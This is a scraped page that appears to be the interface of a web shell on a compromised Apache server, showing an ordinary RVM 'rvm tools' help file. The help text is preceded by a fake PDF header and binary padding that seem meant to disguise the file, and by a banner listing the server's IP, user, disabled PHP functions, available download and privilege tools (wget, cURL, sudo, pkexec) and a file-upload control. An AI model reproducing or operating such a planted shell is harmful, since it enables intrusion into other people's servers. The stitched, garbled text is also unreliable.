...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 65.108.66.160 / Your IP : 216.73.217.50 Web Server : Apache System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64 User : alasaweborg ( 1047) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/local/rvm/help/ |
Upload File : |
$ rvm tools {identifier,path-identifier,strings,mirror,rvm-env}
Provides generic tools related to rvm environments for gaining information
about your current environment. Primarily used for scripting rvm.
Examples:
To get the expanded Ruby string for the current environment, you would run:
$ rvm tools identifier
To get the identifier for a folder (taking into account .rvmrc files and the like),
run this instead:
$ rvm tools path-identifier ~/path/to/directory
Lastly, you can expand example Ruby strings. E.g., to get the current ree version,
run:
$ rvm tools strings ree
In case of network/firewall problems, it is easy to define alternate download URLs:
$ rvm tools mirror
It is possible to use a "shebang" (#!/usr/...) line to select the interpreter
(eg, Ruby 1.9.3) which processes a script file. However, this will work only
on recent Linux kernels (2.6.27.9 and above).
First, you need to define the shebang wrapper:
$ rvm tools rvm-env ruby bash zsh
This will define:
/usr/bin/{ruby,bash,zsh}-rvm-env
Your scripts can then request the proper Ruby, using shebang:
#!/usr/bin/ruby-rvm-env 1.9.3
The script will be run using Ruby 1.9.3 from rvm.
Alternatively, here is a hack to make a script switch itself:
if !ENV['ruby_switch_flag']
ENV['ruby_switch_flag'] = '42'
system('rvm', '1.9.3', 'do', __FILE__, *ARGV)
exit 0
end